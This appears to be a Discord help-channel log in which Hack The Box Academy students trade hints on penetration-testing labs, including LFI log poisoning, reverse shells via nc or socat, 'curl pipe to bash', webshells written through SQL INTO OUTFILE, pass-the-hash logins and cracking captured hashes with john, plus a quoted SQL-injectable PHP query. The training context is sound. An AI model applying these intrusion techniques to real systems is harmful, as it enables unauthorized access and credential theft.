but it worked in when i poison log right, why doesnt the same work when i run with my file

you can use nc socat these commands to get a reverse shell

actually i was able to use php filter and i got the php configuration file

what module and section are you on?

im doing file inclusion and log poisoning section

i wanna know what is preventing me from using the shell

it's an LFI module so how tf did you upload a shell? 🤣

a shell here only work through log poisoning hence the section name

i didnt exactly "upload" it but i used the command execution to "create" (using echo) to make more permanent shell

like they told here

maybe i should've tried reverse shell but it is still puzzling me why isnt my shell working

now sure what method that part show but that isn't the best one

why would you "write" a shell when you have RCE when you can just get a rev shell or if there is curl on the target machine you can get a better shell with curl pipe to bash

also i don't think you can get a rev shell in this

yep just check it's docker through public ip you can't get a rev shell

again i wrote a shell directly to web directory and tried to run command but still something is stopping me and it gives no output

or the target web server technology doesn't support that type of shell

||sudo nmap -sU -F ip -v||

how

but with log poisoning it worked

how exactly are they blocking my shell

wlep if something is unintended you just can't do it 🤣

how did they block it though

weird where is my $_GET

bruh they are replacing my $_GET

?

uhhh i give up they are sanitizing my input? weird

so when I try to do an snmp scan I get no response, even when I reset the IP.

is that the correct community string to use?

😉😉

I got this example from the smnp lab and they don't show any other ways you can write the snmp scan

but they show ways to bruteforce community strings

😉😉

So the 'braa' command could be an option? thats the only other tool I am seeing in the SMNP lab

really?

😉

and 'onesixtyone' too

type this in your terminal
```echo "$term is the value of "'$term'````
and you'll see the problem with $ in linux commands and doublequotes

OHHHH

you could use that for bruteforcjng community strings

i think

so i should've escaped $

yea the $ probably doesnt arrive in the shell, maybe try the command locally first

apparently in single quotes it works but not in double quotes or you find another way to escape it

thanks, that was so confusing now it makes sense

Did I write the right scan?

yes

So is 'nixHARD' the community string I need to run the 'braa' command?

no

Oh okay . the notes mentioned a community string I would need. How would I determine what the community string is

it’s already in the output of this command

Hello, I need help on Documentation & Reporting Practice Lab first question, can anyone give me hint or the way to get the admin cred? i tried everything i can to login but incorrect

https://academy.hackthebox.com/module/162/section/1572

???

😉

I'm in the Password Attacks module, section Pass the Hash, where we have to enable restricted admin mode in order to RDP into the host, but it's not working for some reason... xfreerdp keeps asking for a password, any ideas?

why would you ask that in this server? 🤔

So thats a 'thumbs up'?

Oops i'm sorry wrong server

yes

Are you sure the hash is correct?

My 'braa' scan showed an email address and username. I am guessing that my be pertinent to this task?

yep, I copy-pasted it and can log in with psexec and evilwin-rm just fine, I got the answer without using RDP but I'd still like to know why it isn't working

yes

Try to run the command from psexec or winrm then try rdp again, I think it should work

that's what I did, the first screenshot is from psexec, but I'll try from winrm too

yes that was the problem, i tried again while escaping $ and it worked perfect

same result

Why "131" in rdp command?

i used evil-winrm for that so give that a try maybe

that's not part of the command

I did try, seems like I'll probably have to do the whole thing without RDP

It should work, I did it this way

I'll reset the target and see if that helps

I'm stuck on Attacking Common Applications - Attacking Tomcat, I have not been able to find the flag. Ive tried find / -name tomcat_flag.txt 2>/dev/null But this is all I get as the output I get. Am i missing something?

Do you think I should now try looking at a different port with that email address, like pop3 or ssh?

why simply not get a reverse shell session?

that’s what you should do

Okay. is this Server certificate on the pop3 server from openclient the 'id_rsa.pub' I would create

nobody's in the newb channels

hi

One of the modules I'm doing has this code:

$searchInput =  $_POST['findUser'];
$query = "select * from users where name like '%$searchInput%'";
$result = $conn->query($query);

A bug bounty hunting course and it's giving me insecure code 😹

huh? the point of the CBBH path is to find insecure code and learn how to exploit it

this way worked so far, and i'm fine with sending through my commands in curl

Yeah but it's not yet at the section talking about exploits, it's giving examples of relational databases and how they work

after getting a shell that same command should work because i have the same command in my note

or maybe you can try to url encode that command a bit more

you need valid credentials for that

This certificate isn't a valid id_rsa.pub?

Since you guys are communicating back and forth take to dms

nope, resetting did nothing

Also @cedar void keep moving until you hit a wall its not learning if you keep asking a question every time you just do something

This is the output that I get after encoding the URL

🤷‍♂️ that's why it's better to get a shell

alright, ill try that then

thanks

Because the find command outputs multiple lines. The webpage and parser aren't dynamic

Depending on the web shell you have, commands like find and others, that print out the output to standard out as soon as they have results will be degraded. Meaning that you won't be able to see the results as the "connection" with your webshell is getting closed (simply put)

well, doesn't seem like it can be done without RDP...

You can think of a way to improve your command by simply trying to save the outputted results from the find command to a file for example

And then you can query that file with cat or else

why the Cross-Site Scripting (XSS) module Target doesn't work

I'm not aware of anything, but any other way to pass the hash apart from xfreerdp?

XSS Attacks / Skills Assessment target

have you made the change in the registry entry in the target?

yes, I did that many times with different tools, it doesn't work

Once you have a session on the target, there is only one tool that can make the change

You cannot RDP into the target straight after you've spawned it

I meant that I tried the command with psexec and evil-winrm, neither works, xfreerdp keeps demanding a password when I try to pass the hash

Does the same behaviour continue if you use the workstation in academy

thanks for the suggestion, I will try that as well, althought tbh I'm not a fan of exercises that can't be completed from my own VM

I get an entirely different error in the pwnbox
No protocol specified [17:16:51:566] [2814:2814] [ERROR][com.freerdp.client.x11] - failed to open display: :1 [17:16:51:566] [2814:2814] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

the command you are running please ?

it finally worked... but I really shouldn't have to switch to the pwnbox for this

Eh sometimes things are dumb

I'm just worried I'd have to do something like this in the exam

You can respawn a target and it'll work on your machine the second time

yeah, that happens, unfortunately didn't help in this case

it works fine , on my vm

if it's any consolation I don't recall needing to use pwnbox for that section personally ¯_(ツ)_/¯

that's always fun 😂

(╯°□°)╯︵ ┻━┻

Ikr happens alot

thank you for the help, D0s3nt, MarcieLee and dpgg, finally completed the section from the Pwnbox

lmao, not the next section giving the admin password 😭

no it was the ||Logins.kdbx|| file

has anyone tried to sign up on the wpscan website to get access to the free api key lately? Been waiting like 3 days for the verification email to come through to activate my account. starting to think its not coming

lately no, but it's not supposed to take that long.. you might want to try again and make sure you entered the correct email

yeah im pretty sure i put the email correctly. even tried a second one. very odd

Hi all I'm new to the channel so I hope this is the right place to ask,
I'm currently on the cbbh track and have trouble with some modules using a kali box with vpn. Running the same cmds on htbs' parrot and my kali produce different results. My assumption is it's something about the vpn connection. For example in the Web Service & API Attacks module (just following along) I can ping the target, can run http://<TARGET IP>:3002/wsdl but http://<TARGET IP>:3002/wsdl?wsdl won't work. Proceeding a little further the python script client.py returns ....<success>false</success><error>This function is only allowed in internal networks</error>.... (That's why I'm assuming it's a network issue). Reconnecting vpn or respawning the target didn't fix the issue...
I'm worried what to do if something like this happens in the exam and if anyone else encountered similar issues.

Umm hi?

need help in the following question in SIEM module :

Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format:

What do you not understand?

No one can help you if you ask a question like that

Does anybody know how long it takes to get this working? I'm on Attacking Common Services, Attacking FTP. I reset the machine, do an nmap scan for all ports. I let it sit for 30 minutes and nothing. I repeat and repeat, I've been doing this for hours. https://academy.hackthebox.com/module/116/section/1165

nmap scan should take less than 1 minute

in these modules

first check connection with an icmp trace using ping

yeah I get a ping back

I've seen other people ask the same thing

post your command

They have to keep resetting and waiting, plus its an all port scan -p-

ok

nmap -p- —min-rate 2000 -n -Pn <IP>

nmap -sC -sV -p- 10.129.114.8

lol

dont do sCV on all ports

also add -v

for real?

sometimes nmap will decide to do a tcp connect scan instead of the normal default Syn scan

i usually do -oG allports

ohh, so after an all port scan, then do an sC for the open ports?

you can spot if this happens by turning on verbosity

ye

I get it, thanks so much

-vvv also good as madfox pointed out

Can I DM anyone about the Footprinting HARD lab? I been trying to figure out the key for a few hours and I hit many walls

eh I do -sC -sV on all ports all the time

lol

good job then but no reason to do that xD

dont even need three, just one is enough to see if its accidentally doing a connect scan

more verbosity

cause a connect scan will def take 30+ minutes for all ports

more info

add -sS

yeah. Im just saying its not necessary for the specific issue Ive seen

literally had it happen to me two days ago

lol

weird

maybe your Internet is just ass

that has to be something more :/

and discovering the actual problem from our side is difficult

sheesh

lol

it went up to 2 hours remaining

-T5

thats for TCP connect scan

SYN scan should be faster than T5

T5 is independent of syn or not

Can I DM anyone about the Footprinting HARD lab? I been trying to figure out the key for a few hours and I hit many walls

it finally worked with -T5

thank you

did you try with —min-rate

no I just did ||nmap -sV -p- 10.129.254.24 -v -T5||

why run sV on all ports

idk should I do that AFTER an all scan?

just like for -sC

its w.e

ok lol

i like to discover open ports first

then run sCV only on open ports

ippsec does scv on all ports

iirc

That sounds like a good idea, I appreciate you all for opening my eyes

you are right i had to be missing it with other flag

its kind of difficult to remember all nmap flags 🤣

Personally I dont see it making a difference in total scan completion times(script and version checks are ran after port discovery anyways)

but it can be nice if you want some quick feedback and start poking some obvious stuff right away

I forget the order but doesn't it run each separately in terms of script and version scans idk which it does first

hi, I'm stuck on "Live Engagement, question 2"
module: shells & payloads
It's asking me to upload a reverse shell but I'm unsure how as I cannot find the "upload page" ://

Hello, I need help on Documentation & Reporting Practice Lab first question, can anyone give me hint or the way to get the admin cred? i tried everything i can to login but incorrect

https://academy.hackthebox.com/module/162/section/1572

yes 🙌

Anyone able to help with broken authentication skills assessment? I've gotten a decent bit in and am not sure how much to type out without spoilers

Anyone know how to fix the clock skew issue when using targetedKerberoast.py? I already tried sudo ntpdate <DC IP>

this is an old comment, but this just helped me. Couldn't find a browser to utilize.

Thanks for this ^^

Hi, on SQLMAP ESSENTIALS > Attack Tuning > What's the contents of table flag6? (Case #6) : When running sqlmap with ||risk3||, it detect ||a Timed based heavy query SQLi||. I got the flag that way but it was pretty slow. I wonder if there were "simpler way of getting the flag" or if there is a way to "fine tune sqlmap so that the heavy query is not that long (8 queries per minutes lead to more than 2 hours getting that flag lol)
If someone is available to talk here or in DM about the resolution, that would be nice please 🙂

Hi, i'm ATACCKING COMMON SERVICES - EASY
after pown credencials user and pass , try to upload webshell vía sql INTO OUTFILE, i can not find the directory path. any hint?

Hey, anyone done the Credentials in Object Properties section on the Windows Attacks & Defense module? i'm stuck on question 3, i did filter for the id 4771 that none of them are bonni user. I also noticed that the new login success or failure are not generating only for this id. I tried updating the policy setting in the backend but it's still the same. Can anyone give me a hint please?

If you’re on VBox, you may have to disable the setting that syncs your VM’s time with your host’s time iirc

Or you do what I do when I’m lazy and run all of the commands you want to do on one line, which works sometimes

You're uploading to the web root, figure out what web service it's using and Google what the web root is for it

can anyone help me try to crack this mssql hash? Its from Attacking Common Services. Am I supposed to use John? Because I tried and its saying "No password hashes loaded"

I use the command john --format=mssql hash.txt

What did you copy and paste into the hash.txt file? Sounds like you are missing part of the hash

yeah I did

I mean I echoed into a txt, it looks lik its all there

did you also include the password file in the command? John may think hash.txt is the file with the list of passwords. Your command should be something like john --format=mssql hash.txt rockyou.txt

I totally forgot the password file

wow

It happens

idk its still not working

what is the complete command you are using?

You also have to make sure there are no broken up lines in the hash.txt file

and try removing some of the beginning parts of the hash that john doesn't need

john --format=mssql hash.txt pws.list

I tried taking out some parts too

Is the pws.list the password list provided by the module?

yeah

Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

is the hash in hex format?

username:0x<...>

yes, like :mssqlsvc::WIN-02:80f3f389d1a06c000

not a valid format

dang

where did u find that

nmap script?

||responder||

I'll try getting the hash again, maybe it was just bad?

mssql hashes are stored in hex format

JtR expects this format

i think this is a NetNTLMv2 hash btw xD

or v1 sorry

yes